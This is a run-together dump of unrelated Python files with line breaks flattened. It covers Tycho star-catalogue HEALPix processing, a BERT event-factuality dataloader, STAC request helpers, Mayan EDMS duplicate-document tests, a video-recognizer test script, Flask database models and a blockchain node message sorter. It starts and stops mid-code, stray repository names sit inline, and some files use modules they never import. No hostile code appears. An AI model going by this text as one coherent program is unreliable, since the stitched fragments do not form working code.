if os.path.exists(fitsdir): if len(os.listdir(fitsdir)) > 0: msg = "{} should be empty to get TYCHO FITS file!".format(fitsdir) log.critical(msg) raise ValueError(msg) # ADM make the directory, if needed. else: log.info('Making TYCHO directory for storing FITS files') os.makedirs(fitsdir) # ADM the actual name of the Tycho file and the associated README. tychofn = "tycho2.kd.fits" cosmofile = os.path.join(cosmodir, tychofn) rfile = os.path.join(cosmodir, "README") # ADM the associated output files. outfile = os.path.join(fitsdir, tychofn) routfile = os.path.join(fitsdir, "README") # ADM read in the Tycho file and header in upper-case. objs, hdr = fitsio.read(cosmofile, header=True, upper=True) nobjs = len(objs) done = np.zeros(nobjs, dtype=tychodatamodel.dtype) for col in tychodatamodel.dtype.names: # ADM proper motions need converted to mas/yr. if "PM" in col: done[col] = objs[col]*1000 else: done[col] = objs[col] # ADM add some information to the header copydate = datetime.utcnow().isoformat(timespec='seconds') hdr["COSMODIR"] = cosmodir hdr["COPYDATE"] = copydate # ADM write the data. fitsio.write(outfile, done, extname='TYCHOFITS', header=hdr) # ADM also update the README. msg = "\nCopied from: {}\non: {}\nthe specific file being: {}\n".format( cosmodir, copydate, cosmofile) with open(rfile) as f: readme = f.read() with open(routfile, 'w') as f: f.write(readme+msg) log.info('Wrote Tycho FITS file...t={:.1f}s'.format(time()-start)) return def tycho_fits_to_healpix(): """Convert files in $TYCHO_DIR/fits to files in $TYCHO_DIR/healpix. Returns ------- Nothing But the archived Tycho FITS files in $TYCHO_DIR/fits are rearranged by HEALPixel in the directory $TYCHO_DIR/healpix. The HEALPixel sense is nested with nside=get_tycho_nside(), and each file in $TYCHO_DIR/healpix is called healpix-xxxxx.fits, where xxxxx corresponds to the HEALPixel number. Notes ----- - The environment variable $TYCHO_DIR must be set. """ # ADM the resolution at which the Tycho HEALPix files are stored. nside = get_tycho_nside() npix = hp.nside2npix(nside) # ADM check that the TYCHO_DIR is set. tychodir = get_tycho_dir() # ADM construct the directories for reading/writing files. fitsdir = os.path.join(tychodir, "fits") tychofn = os.path.join(fitsdir, "tycho2.kd.fits") hpxdir = os.path.join(tychodir, "healpix") # ADM make sure the output directory is empty. if os.path.exists(hpxdir): if len(os.listdir(hpxdir)) > 0: msg = "{} must be empty to make Tycho HEALPix files!".format(hpxdir) log.critical(msg) raise ValueError(msg) # ADM make the output directory, if needed. else: log.info("Making Tycho directory for storing HEALPix files") os.makedirs(hpxdir) # ADM read in the Tycho file and assing Tycho objects to HEALPixels. objs, allhdr = fitsio.read(tychofn, header=True, upper=True) pix = radec2pix(nside, objs["RA"], objs["DEC"]) # ADM loop through the pixels and write out the files. for pixnum in range(npix): # ADM construct the name of the output file. outfilename = io.hpx_filename(pixnum) outfile = os.path.join(hpxdir, outfilename) # ADM update the header with new information. hdr = dict(allhdr).copy() hdr["HPXNSIDE"] = nside hdr["HPXNEST"] = True hdr["HPXDATE"] = datetime.utcnow().isoformat(timespec='seconds') # ADM determine which objects are in this pixel and write out. done = objs[pix == pixnum] fitsio.write(outfile, done, extname="TYCHOHPX", header=hdr) log.info('Wrote Tycho HEALPix files...t={:.1f}s'.format(time()-start)) return def make_tycho_files(): """Make the HEALPix-split Tycho files in one fell swoop. 
Returns ------- Nothing But produces: - A FITS file with appropriate header and columns from `tychodatamodel`, and a README in $TYCHO_DIR/fits. - FITS files reorganized by HEALPixel in $TYCHO_DIR/healpix. The HEALPixel sense is nested with nside=get_tycho_nside(), and each file in $TYCHO_DIR/healpix is called healpix-xxxxx.fits, where xxxxx corresponds to the HEALPixel number. Notes ----- - The environment variable $TYCHO_DIR must be set. """ t0 = time() log.info('Begin making Tycho files...t={:.1f}s'.format(time()-t0)) # ADM check that the TYCHO_DIR is set. tychodir = get_tycho_dir() # ADM a quick check that the fits and healpix directories are empty # ADM before embarking on the slower parts of the code. fitsdir = os.path.join(tychodir, 'fits') hpxdir = os.path.join(tychodir, 'healpix') for direc in [fitsdir, hpxdir]: if os.path.exists(direc): if len(os.listdir(direc)) > 0: msg = "{} should be empty to make Tycho files!".format(direc) log.critical(msg) raise ValueError(msg) grab_tycho() log.info('Copied Tycho FITS file from cosmo...t={:.1f}s'.format(time()-t0)) tycho_fits_to_healpix() log.info('Rearranged FITS files by HEALPixel...t={:.1f}s'.format(time()-t0)) return def find_tycho_files(objs, neighbors=True, radec=False): """Find full paths to Tycho healpix files for objects by RA/Dec. Parameters ---------- objs : :class:`~numpy.ndarray` Array of objects. Must contain the columns "RA" and "DEC". neighbors : :class:`bool`, optional, defaults to ``True`` Also return all pixels that touch the files of interest to prevent edge effects (e.g. if a Tycho source is 1 arcsec away from a primary source and so in an adjacent pixel). radec : :class:`bool`, optional, defaults to ``False`` If ``True`` then the passed `objs` is an [RA, Dec] list instead of a rec array that contains "RA" and "DEC". Returns ------- :class:`list` A list of all Tycho files to read to account for objects at the passed locations. Notes ----- - The environment variable $TYCHO_DIR must be set. """ # ADM the resolution at which the Tycho HEALPix files are stored. nside = get_tycho_nside() # ADM check that the TYCHO_DIR is set and retrieve it. tychodir = get_tycho_dir() hpxdir = os.path.join(tychodir, 'healpix') return io.find_star_files(objs, hpxdir, nside, neighbors=neighbors, radec=radec) def find_tycho_files_hp(nside, pixlist, neighbors=True): """Find full paths to Tycho healpix files in a set of HEALPixels. Parameters ---------- nside : :class:`int` (NESTED) HEALPixel nside. pixlist : :class:`list` or `int` A set of HEALPixels at `nside`. neighbors : :class:`bool`, optional, defaults to ``True`` Also return files corresponding to all neighbors that touch the pixels in `pixlist` to prevent edge effects (e.g. a Tycho source is 1 arcsec outside of `pixlist` and so in an adjacent pixel). Returns ------- :class:`list` A list of all Tycho files that need to be read in to account for objects in the passed list of pixels. Notes ----- - The environment variable $TYCHO_DIR must be set. """ # ADM the resolution at which the healpix files are stored. filenside = get_tycho_nside() # ADM check that the TYCHO_DIR is set and retrieve it. tychodir = get_tycho_dir() hpxdir = os.path.join(tychodir, 'healpix') # ADM work with pixlist as an array. pixlist = np.atleast_1d(pixlist) # ADM determine the pixels that touch the passed pixlist. pixnum = nside2nside(nside, filenside, pixlist) # ADM if neighbors was sent, then retrieve all pixels that touch each # ADM pixel covered by the provided locations, to prevent edge effects... 
if neighbors: pixnum = add_hp_neighbors(filenside, pixnum) # ADM reformat in the healpix format used by desitarget. tychofiles = [os.path.join(hpxdir, io.hpx_filename(pn)) for pn in pixnum] return tychofiles def match_to_tycho(objs, matchrad=1., radec=False): """Match objects to Tycho healpixel files. Parameters ---------- objs : :class:`~numpy.ndarray` Must contain at least "RA" and "DEC". matchrad : :class:`float`, optional, defaults to 1 arcsec The radius at which to match in arcseconds. radec : :class:`bool`, optional, defaults to ``False`` If ``True`` then the passed `objs` is an [RA, Dec] list instead of a rec array. Returns ------- :class:`~numpy.ndarray` The matching Tycho information for each object. The returned format is as for desitarget.tychomatch.tychodatamodel with an extra column "TYCHO_SEP" which is the matching distance in ARCSECONDS. Notes ----- - For objects with NO match in Tycho, the "TYC1", "TYC2" and "TYCHO_SEP" columns are -1, and other columns are zero. - Retrieves the CLOSEST match to Tycho for each passed object. - Because this reads in HEALPixel split files, it's (far) faster for objects that are clumped rather than widely distributed. """ # ADM parse whether a structure or coordinate list was passed. if radec: ra, dec = objs else: ra, dec = objs["RA"], objs["DEC"] # ADM set up an array of Tycho information for the output. nobjs = len(ra) done = np.zeros(nobjs, dtype=tychodatamodel.dtype) # ADM objects without matches should have TYC1/2/3, TYCHO_SEP of -1. for col in "TYC1", "TYC2": done[col] = -1 tycho_sep = np.zeros(nobjs) - 1 # ADM determine which Tycho files need to be scraped. tychofiles = find_tycho_files([ra, dec], radec=True) nfiles = len(tychofiles) # ADM catch the case of no matches to Tycho. if nfiles > 0: # ADM loop through the Tycho files and find matches. for ifn, fn in enumerate(tychofiles): if ifn % 500 == 0 and ifn > 0: log.info('{}/{} files; {:.1f} total mins elapsed' .format(ifn, nfiles, (time()-start)/60.)) tycho = fitsio.read(fn) idtycho, idobjs, dist = radec_match_to( [tycho["RA"], tycho["DEC"]], [ra, dec], sep=matchrad, radec=True, return_sep=True) # ADM update matches whenever we have a CLOSER match. ii = (tycho_sep[idobjs] == -1) | (tycho_sep[idobjs] > dist) done[idobjs[ii]] = tycho[idtycho[ii]] tycho_sep[idobjs[ii]] = dist[ii] # ADM add the separation distances to the output array. dt = tychodatamodel.dtype.descr + [("TYCHO_SEP", ">f4")] output = np.zeros(nobjs, dtype=dt) for col in tychodatamodel.dtype.names: output[col] = done[col] output["TYCHO_SEP"] = tycho_sep return output import torch from torch.utils.data import Dataset, DataLoader from transformers import BertTokenizer from config import args from data_utils import LoadData from Model import BaselineBert from tqdm import trange class DataLoaderBert(Dataset): """ To predict the factuality v_t for the event referred to by a word w_t, use the contextualized embeddings in the last layer of the pre-trained BERT model as the input to a two-layer regression model. NOTE: assert w_t is the trigger, and there is only one trigger per sentence. 
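    A minimal sketch of such a two-layer regression head (illustrative only; `hidden_size` is an
    assumed name and the actual head lives in Model.BaselineBert):

        head = torch.nn.Sequential(
            torch.nn.Linear(hidden_size, hidden_size),  # layer 1 on the trigger's BERT embedding
            torch.nn.ReLU(),
            torch.nn.Linear(hidden_size, 1),             # layer 2 -> scalar factuality v_t
        )
        # v_t = head(last_hidden_state[:, trigger_index, :])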
""" def __init__(self, train_path, dev_path, test_path, dataset): super(DataLoaderBert, self).__init__() loaddata = LoadData(train_path, dev_path, test_path) a = loaddata.conllu_counter[dataset] counter = loaddata.counter_process(a) tokenizer = BertTokenizer.from_pretrained(args.bert_model) max_length = 0 for i in range(len(counter)): if len(counter[i].sentence) > max_length: max_length = len(counter[i].sentence) print("max_length", max_length) max_length += 2 # [CLS], [SEP] for i in trange(len(counter)): assert len(counter[i].trigger) == 1, "not one trigger per sentence" counter[i].sentence_emb = torch.tensor(tokenizer.encode(counter[i].sentence, padding='max_length', max_length=max_length)) # [seq_len] counter[i].mask = torch.zeros(max_length) counter[i].mask[:len(counter[i].sentence)+2] = 1 counter[i].adj_matrix = counter[i].trans_data(max_length - 2) counter[i].index = i self.data = counter self.len = len(self.data) print(dataset, self.len) def __getitem__(self, index): ''' return self.data[index].sentence, self.data[index].sentence_emb, self.data[index].index, torch.tensor( self.data[index].trigger_index,dtype=torch.long), torch.tensor(self.data[index].eep) ''' return self.data[index].sentence_emb, self.data[index].mask, self.data[index].adj_matrix, \ torch.tensor(self.data[index].eep[0]), torch.tensor(self.data[index].trigger_index[0], dtype=torch.long), \ self.data[index].trigger[0] def __len__(self): return self.len if __name__ == "__main__": train_dataset = DataLoaderBert("../unified/meantime/train.conll", "../unified/meantime/dev.conll", "../unified/meantime/test.conll", 'train') train_iter = DataLoader(dataset=train_dataset, batch_size=32, shuffle=False) model = BaselineBert() for sentence_emb, mask, adj_matrix, eep, trigger_index, trigger in train_iter: print(sentence_emb.shape) print(mask.shape) print(adj_matrix.shape) print(eep.shape) print(trigger_index.shape) out = model(sentence_emb, trigger_index, mask) # accu = F.l1_loss(out, eep) # print(accu) # # This file is part of Python Client Library for STAC. # Copyright (C) 2019 INPE. # # Python Client Library for STAC is free software; you can redistribute it and/or modify it # under the terms of the MIT License; see LICENSE file for more details. # """Utility data structures and algorithms.""" from requests import get, post from json import dumps class Utils: """Utils STAC object.""" @staticmethod def _get(url, params=None): """Query the STAC service using HTTP GET verb and return the result as a JSON document. :param url: The URL to query must be a valid STAC endpoint. :type url: str :param params: (optional) Dictionary, list of tuples or bytes to send in the query string for the underlying `Requests`. :type params: dict :rtype: dict :raises ValueError: If the response body does not contain a valid json. """ return get(url, params=params) def _post(url, data=None): """Query the STAC service using HTTP POST verb and return the result as a JSON document. :param url: The URL to query must be a valid STAC endpoint. :type url: str :param data: (optional) Dictionary, list of tuples or bytes to send in the query string for the underlying `Requests`. :type params: dict :rtype: dict :raises ValueError: If the response body does not contain a valid json. 
""" return post(url, data=dumps(data), headers={'content-type': 'application/json'}) import torch from torch import nn class Scatter(nn.Module): def __init__(self, dim=0): self.dim = dim super().__init__() def forward(self, data: torch.Tensor, indices: torch.Tensor, updates: torch.Tensor): return torch.scatter(data, self.dim, indices, updates) from mayan.apps.documents.permissions import ( permission_document_tools, permission_document_view ) from mayan.apps.documents.tests.base import GenericDocumentViewTestCase from ..models import DuplicateBackendEntry from .mixins import ( DuplicatedDocumentTestMixin, DuplicatedDocumentToolViewTestMixin, DuplicatedDocumentViewTestMixin ) class DocumentsDuplicateListViewsTestCase( DuplicatedDocumentTestMixin, DuplicatedDocumentViewTestMixin, GenericDocumentViewTestCase ): def test_document_duplicates_list_no_permission(self): self._upload_duplicate_document() response = self._request_test_document_duplicates_list_view() self.assertEqual(response.status_code, 404) def test_document_duplicates_list_with_source_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) response = self._request_test_document_duplicates_list_view() self.assertContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertNotContains( response=response, status_code=200, text=self.test_documents[1].label ) def test_document_duplicates_list_with_target_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) response = self._request_test_document_duplicates_list_view() self.assertEqual(response.status_code, 404) def test_document_duplicates_list_with_full_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) response = self._request_test_document_duplicates_list_view() self.assertContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertContains( response=response, status_code=200, text=self.test_documents[1].label ) def test_document_duplicates_list_trashed_source_with_full_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) self.test_documents[0].delete() response = self._request_test_document_duplicates_list_view() self.assertEqual(response.status_code, 404) def test_document_duplicates_list_trashed_target_with_full_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) self.test_documents[1].delete() response = self._request_test_document_duplicates_list_view() self.assertContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertNotContains( response=response, status_code=200, text=self.test_documents[1].label ) class DuplicatedDocumentListViewsTestCase( DuplicatedDocumentTestMixin, DuplicatedDocumentViewTestMixin, GenericDocumentViewTestCase ): def test_duplicated_document_list_no_permission(self): self._upload_duplicate_document() response = self._request_test_duplicated_document_list_view() self.assertNotContains( response=response, 
status_code=200, text=self.test_documents[0].label ) def test_duplicated_document_list_with_source_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) response = self._request_test_duplicated_document_list_view() self.assertNotContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertNotContains( response=response, status_code=200, text=self.test_documents[1].label ) def test_duplicated_document_list_with_target_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) response = self._request_test_duplicated_document_list_view() self.assertNotContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertNotContains( response=response, status_code=200, text=self.test_documents[1].label ) def test_duplicated_document_list_with_full_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) response = self._request_test_duplicated_document_list_view() self.assertContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertContains( response=response, status_code=200, text=self.test_documents[1].label ) def test_duplicated_document_list_trashed_source_with_full_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) self.test_documents[0].delete() response = self._request_test_duplicated_document_list_view() self.assertNotContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertNotContains( response=response, status_code=200, text=self.test_documents[1].label ) def test_duplicated_document_list_trashed_target_with_full_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) self.test_documents[1].delete() response = self._request_test_duplicated_document_list_view() self.assertNotContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertNotContains( response=response, status_code=200, text=self.test_documents[1].label ) class DuplicatedDocumentToolsViewsTestCase( DuplicatedDocumentTestMixin, DuplicatedDocumentToolViewTestMixin, GenericDocumentViewTestCase ): def test_duplicated_document_scan_no_permission(self): self._upload_duplicate_document() DuplicateBackendEntry.objects.all().delete() response = self._request_duplicated_document_scan_view() self.assertEqual(response.status_code, 403) self.assertFalse( self.test_documents[1] in DuplicateBackendEntry.objects.get_duplicates_of( document=self.test_documents[0] ) ) def test_duplicated_document_scan_with_permission(self): self._upload_duplicate_document() DuplicateBackendEntry.objects.all().delete() self.grant_permission(permission=permission_document_tools) response = self._request_duplicated_document_scan_view() self.assertEqual(response.status_code, 302) self.assertTrue( self.test_documents[1] in DuplicateBackendEntry.objects.get_duplicates_of( document=self.test_documents[0] ) ) test_recognizer.py """test recognizer""" import argparse import 
warnings import mmcv import numpy as np from mmcv.runner import obj_from_dict from torch.nn.parallel import DataParallel, DistributedDataParallel import paddle # from mmcv.parallel import MMDataParallel, MMDistributedDataParallel from codes import datasets from codes.core import (get_dist_info, init_dist, mean_class_accuracy, multi_gpu_test, single_gpu_test, top_k_accuracy) from codes.datasets import build_dataloader from codes.models import build_recognizer from codes.utils import load_checkpoint # from codes.core import MMDataParallel, MMDistributedDataParallel warnings.filterwarnings("ignore", category=UserWarning) args = None def parse_args(): """parse_args""" parser = argparse.ArgumentParser(description='Test an action recognizer') parser.add_argument('config', help='test config file path') parser.add_argument('checkpoint', help='checkpoint file') parser.add_argument( '--launcher', choices=['none', 'pytorch', 'mpi', 'slurm'], default='none', help='job launcher') parser.add_argument( '--gpus', type=int, default=1, help='number of gpus to use ' '(only applicable to non-distributed training)') parser.add_argument( '--average-clips', choices=['score', 'prob'], default='prob', help='average type when averaging test clips') parser.add_argument('--out', help='output result file', default='default.pkl') # only for TSN3D parser.add_argument('--fcn_testing', action='store_true', help='use fcn testing for 3D convnet') parser.add_argument('--local_rank', type=int, default=0) args = parser.parse_args() return args def main(): """main""" global args args = parse_args() if args.out is not None and not args.out.endswith(('.pkl', '.pickle')): raise ValueError('The output file must be a pkl file.') cfg = mmcv.Config.fromfile(args.config) cfg.gpus = args.gpus cfg.data.test.test_mode = True # pass arg of fcn testing if args.fcn_testing: cfg.model.update({'fcn_testing': True}) cfg.model['cls_head'].update({'fcn_testing': True}) if cfg.test_cfg is None: cfg.test_cfg = dict(average_clips=args.average_clips) else: cfg.test_cfg.average_clips = args.average_clips # for regular testing # pipeline_type = [op['type'] for op in cfg.test_pipeline] # if 'ThreeCrop' in pipeline_type: # cfg.model.cls_head.spatial_size = 8 dataset = obj_from_dict(cfg.data.test, datasets, dict(test_mode=True)) if args.launcher == 'none': distributed = False else: distributed = True init_dist(args.launcher, **cfg.dist_params) model = build_recognizer(cfg.model, train_cfg=None, test_cfg=cfg.test_cfg) load_checkpoint(model, args.checkpoint, map_location='cpu') data_loader = build_dataloader( dataset, num_gpus=1 if distributed else cfg.gpus, videos_per_gpu=1, workers_per_gpu=1, dist=distributed, shuffle=False) if distributed: # model = MMDistributedDataParallel(model.cuda()) model = DataParallel(model.cuda(), device_ids=[ torch.cuda.current_device()]) outputs = multi_gpu_test(model, data_loader) rank, _ = get_dist_info() else: # model = MMDataParallel(model, device_ids=range(cfg.gpus)).cuda() model = DataParallel(model, device_ids=range(cfg.gpus)).cuda() outputs = single_gpu_test(model, data_loader) rank = 0 if args.out and rank == 0: # print('\nwriting results to {}'.format(args.out)) # for videos_per_gpu > 1, vstack list of array results = np.vstack(outputs) # list(1 x n_class) -> n_video x n_class # outputs = np.vstack(outputs) [:, np.newaxis, :] mmcv.dump(results, args.out) gt_labels = [] for i in range(len(dataset)): ann = dataset.video_infos[i] gt_labels.append(ann['label']) # if args.use_softmax: # print("Averaging score over {} 
clips with softmax".format( # outputs[0].shape[0])) # results = [softmax(res, dim=1).mean(axis=0) for res in outputs] # else: # print("Averaging score over {} clips without softmax (ie, raw)". # format(outputs[0].shape[0])) # results = [res.mean(axis=0) for res in outputs] # results = [res.squeeze() for res in outputs] top1, top5 = top_k_accuracy(results, gt_labels, k=(1, 5)) mean_acc = mean_class_accuracy(results, gt_labels) print("Mean Class Accuracy = {:.02f}".format(mean_acc * 100)) print("Top-1 Accuracy = {:.02f}".format(top1 * 100)) print("Top-5 Accuracy = {:.02f}".format(top5 * 100)) if __name__ == '__main__': main() """ Contains Databse model classes """ import uuid as uid from werkzeug.security import generate_password_hash, check_password_hash from flask import current_app from app import db from app.errors.custom.database import DBCreationError def rollback_and_log(error): """ Rollback the database and loggs the error. Can be used when overriding http-status 500. """ current_app.logger.error(error) db.session.rollback() def format_dict(dic): """ SqlAlchemy (on Linux) can't handle string arguments on type int. """ if not dic: return {} formated_dic = {} for k, v in dic.items(): formated_dic[k] = int(v) if v.isdigit() else v return formated_dic def get_uuid4(): """ Returns a unique if for feedback view """ return str(uid.uuid4()) class Submission(db.Model): """ Represents an submission """ id = db.Column(db.Integer, primary_key=True) uuid = db.Column(db.String(45), default=get_uuid4) user_id = db.Column(db.Integer, nullable=False, index=True) user_acronym = db.Column(db.String(6), nullable=False) assignment_name = db.Column(db.String(9), nullable=False) assignment_id = db.Column(db.Integer, nullable=False) course_id = db.Column(db.Integer, db.ForeignKey('course.id'), nullable=False) course = db.relationship( 'Course', primaryjoin="Course.id == Submission.course_id", backref=db.backref('courses', uselist=False)) attempt_nr = db.Column(db.Integer, nullable=False) grade = db.Column(db.String(2), default=None) feedback = db.Column(db.Text, default=None) workflow_state = db.Column(db.String(15), default='new') # new/tested/graded/ zip_file_path = db.Column(db.String(255), default=None) def __repr__(self): return ''.format( self.user_acronym, self.assignment_name, self.course.name) class Course(db.Model): """ Represents a course """ id = db.Column(db.Integer, primary_key=True, autoincrement=False, nullable=False) name = db.Column(db.String(25), nullable=False) active = db.Column(db.Integer, default=1) @property def serialize(self): """ Returns the course as an object """ return { 'id': self.id, 'name': self.name, 'active': self.active, } @classmethod def create(cls, **kwargs): """ Creates a course and adds it to the database. """ if cls.query.filter_by(id=kwargs.get('id')).first() is not None: raise DBCreationError(f'ID {kwargs.get("id")} already exists.') course = cls(**kwargs) db.session.add(course) db.session.commit() return course def update(self, data): """ Updates a course and commits changes to the database. """ self.active = data.get('active') or self.active self.name = data.get('name') or self.name db.session.commit() return self def delete(self): """ Deletes a course and commits changes to the database. 
""" db.session.delete(self) db.session.commit() return self def __repr__(self): return ''.format(self.id, self.name, self.active == 1) class User(db.Model): """ Represents a system user """ id = db.Column(db.Integer, primary_key=True, autoincrement=True) username = db.Column(db.String(25), unique=True) password_hash = db.Column(db.String(128)) @property def password(self): """ Getter for password """ raise AttributeError('password is not readable') @password.setter def password(self, password): """ Setter for password """ self.password_hash = generate_password_hash(password) def compare_password(self, password): """ Compares given password to the hashed password """ return check_password_hash(self.password_hash, password) def __repr__(self): return ''.format(self.username) snwokenk/Orses_Core """ sorts the messages received from connected protocols' dataReceived determines if message should go to blockchain propagator or Network propagator. Messages for Blockchain Propagator are messages sending new blocks, or wallet_hash states Messges for Network Propagator are transaction messages and assignment statement messages (if proxy of bk_connected wallet being used) """ from Orses_Dummy_Network_Core.DummyVeriNodeConnector import DummyVeriNodeConnector from Orses_Validator_Core.ConnectedNodeValidator import ConnectedNodeValidator import json, copy class NetworkMessageSorter: def __init__(self, q_object_from_protocol, q_for_bk_propagate, q_for_propagate, n_propagator_inst, b_propagator_inst, node=None, admin=None): self.node = node self.admin = admin if admin is not None else self.node.admin self.network_prop_inst = n_propagator_inst self.blockchain_prop_inst = b_propagator_inst self.q_for_propagate = q_for_propagate self.q_for_bk_propagate = q_for_bk_propagate self.q_object_from_protocol = q_object_from_protocol self.convo_dict = dict() # a little different from others self.non_validated_connected_protocols_dict = dict() self.validated_conn_protocols_dict = dict() def add_protocol(self, protocol): # todo: rather than connecting to protocols dict, # todo: add to a preliminary dict until validated, then add to protocols dict # adds connected protocol, key as protocol_id, value: # list [protocol object, number of convo(goes to 20000 and resets)] self.non_validated_connected_protocols_dict.update({protocol.proto_id: [protocol, 0]}) self.convo_dict[protocol.proto_id] = dict() # # add to blockchain propagator connected dict # self.blockchain_prop_inst.connected_protocols_dict.update({protocol.proto_id: [protocol, 0]}) # self.blockchain_prop_inst.convo_dict[protocol.proto_id] = dict() # # add to network propagaor # self.network_prop_inst.connected_protocols_dict.update({protocol.proto_id: [protocol, 0]}) # self.network_prop_inst.convo_dict[protocol.proto_id] = dict() if isinstance(protocol, DummyVeriNodeConnector): # must send a validator message to complete connection on both ends self.network_prop_inst.reactor_instance.callInThread( self.create_sender_message, protocol=protocol, admin_inst=self.admin ) print(f"in NetworkMessageSorter.py Listener Protocol Created When Connected {protocol}") def add_protocol_to_all(self, protocol): """ when node validated add it to :param protocol: :return: """ # add to blockchain propagator connected dict self.blockchain_prop_inst.add_protocol(protocol=protocol) # add to network propagaor self.network_prop_inst.add_protocol(protocol=protocol) def run_sorter(self): """ :return: """ #todo: add message receiver for Node Validator while True: msg = 
self.q_object_from_protocol.get() # msg = [protocol id, data], data = [type(b or n), convo id, etc] try: msg[1] = json.loads(msg[1].decode()) # decode data bytes to string, then json decode except ValueError: print("in NetworkMessageSorter, json message error") continue except AttributeError as e: # not able to decode() probably a string if isinstance(msg, str) and msg in {"quit", "exit", "force exit"}: break else: print(f"\n-----\nError in {__file__}\nMessage causing Error: {msg}\n" f"Exception raised: {e}") continue if msg[0] in self.non_validated_connected_protocols_dict: # if in it, then peer node not yet validated protocol_id = msg[0] msg_data = msg[1] # [type(b or n), convo id, etc] local_convo_id = msg_data[1][0] if local_convo_id is not None and local_convo_id in self.convo_dict[protocol_id]: self.network_prop_inst.reactor_instance.callInThread( self.convo_dict[protocol_id][local_convo_id].listen, msg=msg_data ) elif local_convo_id is None: self.network_prop_inst.reactor_instance.callInThread( self.create_receiver_message, msg=msg_data, protocol=self.non_validated_connected_protocols_dict[protocol_id][0], admin_inst=self.admin, ) else: print(f"in NetworkMessageSorter, Node Not Validated and No Options Available") pass elif msg[0] in self.validated_conn_protocols_dict: try: # check what type of message, if 'n' then networkpropagator, if 'b' then blockchainpropagator try: print(f"in message sorter, admin:{self.node.admin.admin_name if self.node else None}, msg: {msg}, " f"") except AttributeError: pass if msg[1][0] == 'n': self.q_for_propagate.put(msg) # goes to NetworkPropagator.py, run_propagator_convo_manager elif msg[1][0] == 'b': self.q_for_bk_propagate.put(msg) # goes to BlockchainPropagator.py, run_propagator_convo_manager else: print("in NetworkMessageSorter.py, msg could not be sent to any process", msg) except IndexError as e: print(f"\n-----\nError in {__file__}\nMessage causing Error: {msg}\n" f"Exception raised: {e}") continue else: print(f"in NetworkMessageSorter.py, protocol id not in validated Or Non Validated") print("in NetworkMessageSorter.py Sorter Ended") def create_sender_message(self, protocol, admin_inst): if protocol.proto_id in self.convo_dict and self.convo_dict[protocol.proto_id]: # only one convo should be had which is validatorMessage return else: convo_id = -1 host_addr = protocol.transport.getHost() peer_addr = protocol.transport.getPeer() knw_addr = copy.deepcopy(admin_inst.known_addresses) try: knw_addr.pop(host_addr.host) except KeyError: pass try: knw_addr.pop(peer_addr.host) except KeyError: pass sender = NodeValidatorSender( protocol=protocol, convo_id=convo_id, propagator_inst=self.network_prop_inst, msg_sorter_inst=self, admin_inst=admin_inst, message_list=[ {"1": ConnectedNodeValidator.get_hash_of_important_files(admin_inst), "2": [host_addr.host, host_addr.port], "3": len(knw_addr) }, list(knw_addr) ] ) self.convo_dict[protocol.proto_id] = {convo_id: sender} sender.speak() def create_receiver_message(self, msg, protocol, admin_inst): if protocol.proto_id in self.convo_dict and self.convo_dict[protocol.proto_id]: # only one convo should be had which is validatorMessage return else: convo_id = msg[1] convo_id[0] = -1 host_addr = protocol.transport.getHost() peer_addr = protocol.transport.getPeer() knw_addr = copy.deepcopy(admin_inst.known_addresses) try: knw_addr.pop(host_addr.host) except KeyError: pass try: knw_addr.pop(peer_addr.host) except KeyError: pass receiver = NodeValidatorReceiver( protocol=protocol, convo_id=convo_id, 
propagatorInst=self.network_prop_inst, msg_sorter_inst=self, admin_instance=admin_inst, conn_node_validator=ConnectedNodeValidator, known_addr=knw_addr ) self.convo_dict[protocol.proto_id] = {convo_id[0]: receiver} receiver.listen(msg=msg) # helper functions class NodeValidatorSender: def __init__(self, protocol, convo_id, message_list, propagator_inst, msg_sorter_inst: NetworkMessageSorter, admin_inst): # {"1": software_hash_list, "2": ip address, "3": number of known address} self.msg_sorter_inst = msg_sorter_inst self.main_msg = message_list[0] self.addr_list = message_list[1] self.not_compatible_msg = "ntc" self.admin_inst = admin_inst self.propagator_inst = propagator_inst self.last_msg = 'end' self.verified_msg = 'ver' self.rejected_msg = 'rej' self.send_tx_msg = 'snd' self.need_pubkey = 'wpk' self.prop_type = 'n' self.end_convo = False self.end_convo_reason = None self.protocol = protocol self.local_convo_id = convo_id self.other_convo_id = None # in listen() get other convo_id self.convo_id = [self.other_convo_id, self.local_convo_id] self.sent_first_msg = False def speak(self, rsp=None): if self.end_convo is False: if self.sent_first_msg is False and rsp is None: self.sent_first_msg = True self.speaker(msg=f'e{self.admin_inst.admin_name}') elif rsp is not None: self.speaker(msg=rsp) def listen(self, msg): print(f"in Networkmessagesorter.py, listen, networkmessagesender msg\n" f"{msg}") if self.end_convo is False: if isinstance(msg[-1], str) and msg[-1] in {self.verified_msg, self.rejected_msg, self.last_msg}: self.end_convo = True self.end_convo_reason = msg[-1] try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] if msg[-1] == self.last_msg: self.msg_sorter_inst.validated_conn_protocols_dict[self.protocol.proto_id] = self.protocol 